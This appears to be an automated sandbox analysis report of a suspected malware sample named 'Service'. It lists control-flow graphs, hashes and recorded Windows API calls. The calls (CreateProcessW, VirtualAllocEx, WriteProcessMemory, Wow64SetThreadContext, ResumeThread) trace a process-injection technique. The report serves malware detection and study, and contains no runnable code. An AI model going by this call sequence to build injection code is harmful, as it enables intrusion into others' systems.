                      control_flow_graph 524 b94e34-b94ecb 526 b94ecd-b94edf 524->526 527 b94ee2-b94ef0 524->527 526->527 528 b94ef2-b94f04 527->528 529 b94f07-b94f43 527->529 528->529 530 b94f45-b94f54 529->530 531 b94f57-b95024 CreateProcessW 529->531 530->531 535 b9502d-b950ec 531->535 536 b95026-b9502c 531->536 546 b950ee-b95117 535->546 547 b95122-b9512d 535->547 536->535 546->547 551 b9512e 547->551 551->551
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B95011
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: d4207da47e494680f44fb18b8c4e4e13f2a8724ad0c5aa7d9eab045c1f014e05
                      • Instruction ID: 266280968202a14b4d70eaf0f2c806cfd2d2bc1d1fc6c38eaf8bf932331248c2
                      • Opcode Fuzzy Hash: d4207da47e494680f44fb18b8c4e4e13f2a8724ad0c5aa7d9eab045c1f014e05
                      • Instruction Fuzzy Hash: 5A81AF75D00269DFDF21CFA9C940BEEBBF5AB49300F1091AAE508B7261DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 552 b91b9c-b91c33 554 b91c4a-b91c58 552->554 555 b91c35-b91c47 552->555 556 b91c5a-b91c6c 554->556 557 b91c6f-b91cab 554->557 555->554 556->557 558 b91cad-b91cbc 557->558 559 b91cbf-b91d8c CreateProcessW 557->559 558->559 563 b91d8e-b91d94 559->563 564 b91d95-b91e54 559->564 563->564 574 b91e8a-b91e95 564->574 575 b91e56-b91e7f 564->575 578 b91e96 574->578 575->574 578->578
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B91D79
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 4e671b4da6f8a8534882196c94d14a0937e0cbb589df4a3396b32d8f7a04cb42
                      • Instruction ID: e7519c3e80cdf21854b773d0a5e39e0bd3db12de5c9f204142143157030c0f5e
                      • Opcode Fuzzy Hash: 4e671b4da6f8a8534882196c94d14a0937e0cbb589df4a3396b32d8f7a04cb42
                      • Instruction Fuzzy Hash: 7D81B174C00229DFDF21CFA9C940BEDBBF5AB49300F1095AAE509B7260DB709A89DF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 580 b97cdc-b97d73 582 b97d8a-b97d98 580->582 583 b97d75-b97d87 580->583 584 b97d9a-b97dac 582->584 585 b97daf-b97deb 582->585 583->582 584->585 586 b97ded-b97dfc 585->586 587 b97dff-b97ecc CreateProcessW 585->587 586->587 591 b97ece-b97ed4 587->591 592 b97ed5-b97f94 587->592 591->592 602 b97fca-b97fd5 592->602 603 b97f96-b97fbf 592->603 607 b97fd6 602->607 603->602 607->607
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B97EB9
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 615878f58f343d4eeb1eed7fdf2e9bf22d831d37421700f4ba875a88a41b05eb
                      • Instruction ID: 04cbb0071ebf5c414fe929d548717c7e0a5d5c63abd7009adaae53e8cd627654
                      • Opcode Fuzzy Hash: 615878f58f343d4eeb1eed7fdf2e9bf22d831d37421700f4ba875a88a41b05eb
                      • Instruction Fuzzy Hash: E981BF75C00269DFDF21CFA9C984BEDBBF5AB49300F1091AAE508B7260DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 608 b95c6c-b95d03 609 b95d1a-b95d28 608->609 610 b95d05-b95d17 608->610 611 b95d2a-b95d3c 609->611 612 b95d3f-b95d7b 609->612 610->609 611->612 613 b95d7d-b95d8c 612->613 614 b95d8f-b95e5c CreateProcessW 612->614 613->614 618 b95e5e-b95e64 614->618 619 b95e65-b95f24 614->619 618->619 629 b95f5a-b95f65 619->629 630 b95f26-b95f4f 619->630 634 b95f66 629->634 630->629 634->634
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B95E49
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 8b1b67d91685686648baecfa2b0790c14c38a5192bef49cb5ced18c3cd5ae416
                      • Instruction ID: e5d3b26a6a29b9fe5b78829df01951ec9ddf2ab5e1bc050834f35634acdb30f8
                      • Opcode Fuzzy Hash: 8b1b67d91685686648baecfa2b0790c14c38a5192bef49cb5ced18c3cd5ae416
                      • Instruction Fuzzy Hash: 8881BF75C00229DFDF21DFA9C940BEDBBF5AB09300F1091AAE508B7260DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 635 b96ea4-b96f3b 636 b96f3d-b96f4f 635->636 637 b96f52-b96f60 635->637 636->637 638 b96f62-b96f74 637->638 639 b96f77-b96fb3 637->639 638->639 640 b96fb5-b96fc4 639->640 641 b96fc7-b97094 CreateProcessW 639->641 640->641 645 b9709d-b9715c 641->645 646 b97096-b9709c 641->646 656 b9715e-b97187 645->656 657 b97192-b9719d 645->657 646->645 656->657 660 b9719e 657->660 660->660
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B97081
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 57216efc940989321227477676fc5ac4c74f63e89e8edb27bbce27ec273d173a
                      • Instruction ID: d671c8a56dbb34661e2e4a67829708cd79d8ee3d37b00aa80db529a4cb9e6d61
                      • Opcode Fuzzy Hash: 57216efc940989321227477676fc5ac4c74f63e89e8edb27bbce27ec273d173a
                      • Instruction Fuzzy Hash: 2C81BF75C00269CFDF25CFA9D980BEDBBF5AB09300F1091AAE508B7260DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 662 b91ba8-b91c33 663 b91c4a-b91c58 662->663 664 b91c35-b91c47 662->664 665 b91c5a-b91c6c 663->665 666 b91c6f-b91cab 663->666 664->663 665->666 667 b91cad-b91cbc 666->667 668 b91cbf-b91d8c CreateProcessW 666->668 667->668 672 b91d8e-b91d94 668->672 673 b91d95-b91e54 668->673 672->673 683 b91e8a-b91e95 673->683 684 b91e56-b91e7f 673->684 687 b91e96 683->687 684->683 687->687
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B91D79
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 0a8ad7ff16c1802b6a3e7670eaeca0eaf5f9d75561eefcefb8edc9f6741bb704
                      • Instruction ID: e5c1b88afdf6787b3918847fec9951344d05ed18c94f5ccd7a6edc020ceec271
                      • Opcode Fuzzy Hash: 0a8ad7ff16c1802b6a3e7670eaeca0eaf5f9d75561eefcefb8edc9f6741bb704
                      • Instruction Fuzzy Hash: 3481B174C00269DFDF21CFA9C940BEDBBF5AB49300F1095AAE509B7260DB709A89DF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 770 b97ce8-b97d73 771 b97d8a-b97d98 770->771 772 b97d75-b97d87 770->772 773 b97d9a-b97dac 771->773 774 b97daf-b97deb 771->774 772->771 773->774 775 b97ded-b97dfc 774->775 776 b97dff-b97ecc CreateProcessW 774->776 775->776 780 b97ece-b97ed4 776->780 781 b97ed5-b97f94 776->781 780->781 791 b97fca-b97fd5 781->791 792 b97f96-b97fbf 781->792 796 b97fd6 791->796 792->791 796->796
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B97EB9
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 0c3b3af7763df9d5fea8dbd64f850b498e9c98cc6839bcf24d14d554fce470a9
                      • Instruction ID: 5ad8eeedb3e1b2f2c1d6a0248e612bd9574f02f78bd9006eade1bd042be3bea5
                      • Opcode Fuzzy Hash: 0c3b3af7763df9d5fea8dbd64f850b498e9c98cc6839bcf24d14d554fce470a9
                      • Instruction Fuzzy Hash: 1081AE75C00269CFDF21CFA9C984BEDBBF5AB49304F1091AAE508B7260DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 716 b95c78-b95d03 717 b95d1a-b95d28 716->717 718 b95d05-b95d17 716->718 719 b95d2a-b95d3c 717->719 720 b95d3f-b95d7b 717->720 718->717 719->720 721 b95d7d-b95d8c 720->721 722 b95d8f-b95e5c CreateProcessW 720->722 721->722 726 b95e5e-b95e64 722->726 727 b95e65-b95f24 722->727 726->727 737 b95f5a-b95f65 727->737 738 b95f26-b95f4f 727->738 742 b95f66 737->742 738->737 742->742
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B95E49
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: cdaf73943da121f35e521f275559c940ab94918a495c16cc7310265a45a8454c
                      • Instruction ID: 390048bdf804179721c538925559f1466d0e74ffec4041b9c1d96e2ebfb167d4
                      • Opcode Fuzzy Hash: cdaf73943da121f35e521f275559c940ab94918a495c16cc7310265a45a8454c
                      • Instruction Fuzzy Hash: E981AE75C00269DFDF21DFA9C944BEEBBF5AB49300F1091AAE508B7260DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 743 b96eb0-b96f3b 744 b96f3d-b96f4f 743->744 745 b96f52-b96f60 743->745 744->745 746 b96f62-b96f74 745->746 747 b96f77-b96fb3 745->747 746->747 748 b96fb5-b96fc4 747->748 749 b96fc7-b97094 CreateProcessW 747->749 748->749 753 b9709d-b9715c 749->753 754 b97096-b9709c 749->754 764 b9715e-b97187 753->764 765 b97192-b9719d 753->765 754->753 764->765 768 b9719e 765->768 768->768
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B97081
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 1614f85cb47e40e8c1e329f067fbc0bd9db2d00eeb1edc49727e07f0ebfe50b7
                      • Instruction ID: b102be2c858ab095a9fd4b103cd1d7329e5977db8762ddd7c9ab9882a7186231
                      • Opcode Fuzzy Hash: 1614f85cb47e40e8c1e329f067fbc0bd9db2d00eeb1edc49727e07f0ebfe50b7
                      • Instruction Fuzzy Hash: 0A81AF74C00269CFDF25CFA9D980BEDBBF5AB49300F1091AAE508B7261DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 689 b94e40-b94ecb 690 b94ecd-b94edf 689->690 691 b94ee2-b94ef0 689->691 690->691 692 b94ef2-b94f04 691->692 693 b94f07-b94f43 691->693 692->693 694 b94f45-b94f54 693->694 695 b94f57-b95024 CreateProcessW 693->695 694->695 699 b9502d-b950ec 695->699 700 b95026-b9502c 695->700 710 b950ee-b95117 699->710 711 b95122-b9512d 699->711 700->699 710->711 715 b9512e 711->715 715->715
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B95011
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 308521af254cdfa4f82a832128361b19ba2888a570a1c6d680ab6074ec131cf6
                      • Instruction ID: a326d99ade080bda8d72fa5662acd9b40c16e990c4d13e1357f76007fcba594f
                      • Opcode Fuzzy Hash: 308521af254cdfa4f82a832128361b19ba2888a570a1c6d680ab6074ec131cf6
                      • Instruction Fuzzy Hash: 0A81AF75C00269DFDF21CFA9C940BEEBBF5AB49300F1091AAE508B7261DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 797 b921f0-b9225f 798 b92261-b92273 797->798 799 b92276-b922d6 WriteProcessMemory 797->799 798->799 800 b922d8-b922de 799->800 801 b922df-b9231d 799->801 800->801
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B922C6
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 2ec193b2a401cf24303f04e4251d3d182c6b74d2f5cb6ce121d42b0662cbbf76
                      • Instruction ID: d4301e80b033aba0f2b57738432d3d924190148fe6c7e4daf9c9e2b67b4e1810
                      • Opcode Fuzzy Hash: 2ec193b2a401cf24303f04e4251d3d182c6b74d2f5cb6ce121d42b0662cbbf76
                      • Instruction Fuzzy Hash: 5E4178B5D042589FCF00CFA9D984ADEFBF1BB49310F24906AE818B7250D374AA45CB64
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B922C6
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 305bde68640a8bf33abd48f78e0e4902fac99c9d368cc54520bba1d936dcb5ae
                      • Instruction ID: 2fdb95f330fe3a86e3e3cdd9705fade90c6024fe330091080cd996f442d1edf9
                      • Opcode Fuzzy Hash: 305bde68640a8bf33abd48f78e0e4902fac99c9d368cc54520bba1d936dcb5ae
                      • Instruction Fuzzy Hash: 9B4167B5D042589FCF00CFA9D984ADEFBF1BB49310F24906AE918B7210D375AA45CF64
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B92085
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 93c41dde47b90d3846ff3b5d66014e81abd674be19094bdcc1f085ae7f71975f
                      • Instruction ID: 3096a283ac9220dc608592358009b659d43787936ec691d55431b07f33f17d0d
                      • Opcode Fuzzy Hash: 93c41dde47b90d3846ff3b5d66014e81abd674be19094bdcc1f085ae7f71975f
                      • Instruction Fuzzy Hash: D33167B9D042589FCF10CFAAD984ADEFBB5BB19310F20A06AE914B7210D375A945CF64
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B92085
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 14d7671640a2b683e7a17fd83fa5839ba4a702de7f6db386ea111e4c452ca951
                      • Instruction ID: 723bd99d4e89c4860be57fd4a98537927ee9f1ff9b382fa81a80986a0afdb0f4
                      • Opcode Fuzzy Hash: 14d7671640a2b683e7a17fd83fa5839ba4a702de7f6db386ea111e4c452ca951
                      • Instruction Fuzzy Hash: A03169B9D04258DFCF10CFA9D584ADEFBB1BB19310F14A06AE814B7210D375A945CF65
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B92195
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: ca2d9a22177c2552236838e1cba11b594e90551b64c3a7cefe5283bf12863f0b
                      • Instruction ID: 5c8f075c7bc571f5558963eea474e5fb155ff9ce81bb77ab19af0bb2ee4e0ed9
                      • Opcode Fuzzy Hash: ca2d9a22177c2552236838e1cba11b594e90551b64c3a7cefe5283bf12863f0b
                      • Instruction Fuzzy Hash: 693167B9D04258DFCF10CFA9D984A9EFBB1BB09310F20A06AE918B7310D375A955CF64
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B92195
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: b2a1b140b61afb6287e56bde3d034834647b154b142bdd3efa32b83053cd6b71
                      • Instruction ID: ba1c7461fc8a74c366dd0c8c60daee354e37b484eeb066d9cc934e25e319d15d
                      • Opcode Fuzzy Hash: b2a1b140b61afb6287e56bde3d034834647b154b142bdd3efa32b83053cd6b71
                      • Instruction Fuzzy Hash: 3F3176B9D04258DFCF10CFA9D980A9EFBB5BB09310F20A02AE914B7310D375A955CF64
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00B91F72
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 723a873b07a661a5fd5ee48b3a733f1c2497d1c22a993f592097a8f4258fa82f
                      • Instruction ID: 2a3f17dec4e532eec500de8e4b5eae3772f7f4c6e9722b95cf7892bec44e35ef
                      • Opcode Fuzzy Hash: 723a873b07a661a5fd5ee48b3a733f1c2497d1c22a993f592097a8f4258fa82f
                      • Instruction Fuzzy Hash: 4A31A7B5D012599FCF10CFAAD984ADEFBF1BB49310F24906AE418B7210D378AA45CF64
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00B91F72
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: cff3256580277cf5b04a1de5576dcd284a08b32d56e6a722585e759840622ff3
                      • Instruction ID: 4b1940544373c2dbeb783ded0d79c5234cc3fa138cdd29b9d67953cdaea4b366
                      • Opcode Fuzzy Hash: cff3256580277cf5b04a1de5576dcd284a08b32d56e6a722585e759840622ff3
                      • Instruction Fuzzy Hash: 2E31C7B5D012599FCF10CFAAD984ADEFBF1BB49314F24806AE418B7250D378AA45CF64
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 00B923AE
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 44441f0b138464570c33b419a25e5dc2eb5c43cd98954a89b286c45f24a980b3
                      • Instruction ID: 8676e99eb04d2445578b8c419b3df25dabea8e986ee6647bbcbb6389c2e37538
                      • Opcode Fuzzy Hash: 44441f0b138464570c33b419a25e5dc2eb5c43cd98954a89b286c45f24a980b3
                      • Instruction Fuzzy Hash: C82199B9D042199FCB10CFA9D584A9EFBF0AB48310F24905AE818B7310D375A945CFA4
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 00B923AE
                      Memory Dump Source
                      • Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_24_2_b90000_Service.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: ba59b9b8cc5da2b4ce8024ebf6d308ad1f97427e4564b5eb3741f0e77e5c4c80
                      • Instruction ID: da65638ea6a9677a9c20c35ceee9a90b41e4a040b5fa35074d8025c76e2530f7
                      • Opcode Fuzzy Hash: ba59b9b8cc5da2b4ce8024ebf6d308ad1f97427e4564b5eb3741f0e77e5c4c80
                      • Instruction Fuzzy Hash: 97218AB9D042199FCB10CFA9D584ADEFBF4AB49320F24906AE914B7310D375A945CFA8
                      Memory Dump Source
                      • Source File: 00000019.00000002.2530107470.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_25_2_4b40000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d71c962531e98e8572e9a41204a7045049fcac082900d094667790f5a6af054d
                      • Instruction ID: 808ae9eb032817755c21fb4d6e467fad37cfd7b84dab9930b67aa85ecaf9394c
                      • Opcode Fuzzy Hash: d71c962531e98e8572e9a41204a7045049fcac082900d094667790f5a6af054d
                      • Instruction Fuzzy Hash: 90518D30B146418FDB55EB78E85956E7FA2FFD63003109A2CD0469B3A9EF78AC049BC1
                      Memory Dump Source
                      • Source File: 00000019.00000002.2530107470.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_25_2_4b40000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6cd07ca6c7febbe69e834ccf3154b3227520bffd3576d7b29548ae7f698e87d6
                      • Instruction ID: 0d7623205f9d37c5b3950123328dd90c12c66957ff89917ca920d5bf9759ba6f
                      • Opcode Fuzzy Hash: 6cd07ca6c7febbe69e834ccf3154b3227520bffd3576d7b29548ae7f698e87d6
                      • Instruction Fuzzy Hash: 96919F34B146018FDB55EB78E859A2E7BA2FFC9300B10956CE506DB3A9DF74AC049BC1
                      Memory Dump Source
                      • Source File: 00000019.00000002.2530107470.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_25_2_4b40000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b6217b57fd371af3e42f3de423f0670ea4f7f45b324864dfc367a2b0f9b8b254
                      • Instruction ID: 0ee8ae1dd906878a82f5a3d28a21ec33d8b7b9b68f7636f6e349dd63fe742687
                      • Opcode Fuzzy Hash: b6217b57fd371af3e42f3de423f0670ea4f7f45b324864dfc367a2b0f9b8b254
                      • Instruction Fuzzy Hash: F1319231B016418BEA65ABBD981912F7AE2FFC5210300993DD157CB791DF74ED008BC2
                      Memory Dump Source
                      • Source File: 00000019.00000002.2530107470.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_25_2_4b40000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 025520fa41742cbdadde12135a820d523dfce0b3b14876f651c5ad784a101b24
                      • Instruction ID: 63922a2eb3efaff82220184093270157a8e618f8128de76bc2440f6a3a0fda6e
                      • Opcode Fuzzy Hash: 025520fa41742cbdadde12135a820d523dfce0b3b14876f651c5ad784a101b24
                      • Instruction Fuzzy Hash: 95219D61F042059FEB04EBFD881936EBAEBEFC9300B14842DE64AD7396DD748D0187A1
                      Memory Dump Source
                      • Source File: 00000019.00000002.2530107470.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_25_2_4b40000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1f3f1271bb1459e6421b1061920b44bd5a3b62ca6406548616dca10b7c67a842
                      • Instruction ID: 56aa4ac8270806879a578d7c8757c43f57ee16cdacb22b22a82e893fd80c7a59
                      • Opcode Fuzzy Hash: 1f3f1271bb1459e6421b1061920b44bd5a3b62ca6406548616dca10b7c67a842
                      • Instruction Fuzzy Hash: 56215A74A0020ADFDB44EBB8D850AADBBB6FF94300F209669D105A7359EB746A50CB51
                      Memory Dump Source
                      • Source File: 00000019.00000002.2530107470.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_25_2_4b40000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9e1e81c46882b73589eb81e6a39835ff1832349e82e87f45441fe8f5a522bf2a
                      • Instruction ID: e61b76013cdc4e77d6730f362b5cb8e65c1c51eed14a4603c8631aeda000d805
                      • Opcode Fuzzy Hash: 9e1e81c46882b73589eb81e6a39835ff1832349e82e87f45441fe8f5a522bf2a
                      • Instruction Fuzzy Hash: 7D21AE30B08244CFCB24EBB8C5547ADBBE2EFC1310F1885A9C509AB696DB316D05CB81
                      Memory Dump Source
                      • Source File: 00000019.00000002.2530107470.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_25_2_4b40000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ca1371b64f9a90e56cfdd80d2f283a56c5a886e2e2e547e94497ced03f93d675
                      • Instruction ID: 5a1d6663dbf8d9706fe8fd9d08507c8b0459d5f7b3ccfd654592e82bac83aae9
                      • Opcode Fuzzy Hash: ca1371b64f9a90e56cfdd80d2f283a56c5a886e2e2e547e94497ced03f93d675
                      • Instruction Fuzzy Hash: 76210E34104947CFDB66EB28F890E593F61FBA4304B12BA5CD1086B21DDBB86909CBC0
                      Memory Dump Source
                      • Source File: 00000019.00000002.2530107470.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_25_2_4b40000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 35405b024062929495db159b86a5a92a1eb2faf811aad8cdab2dc96f58ad95c7
                      • Instruction ID: 17babdcb5cc32866111ff104c14adfe2017f0e503aa0611a08450df5d1707f1e
                      • Opcode Fuzzy Hash: 35405b024062929495db159b86a5a92a1eb2faf811aad8cdab2dc96f58ad95c7
                      • Instruction Fuzzy Hash: FA119C74211A07CFDB66FF18F890E553BA5FBA4304712BA5C9108AB22DDBB869059FC0
                      Memory Dump Source
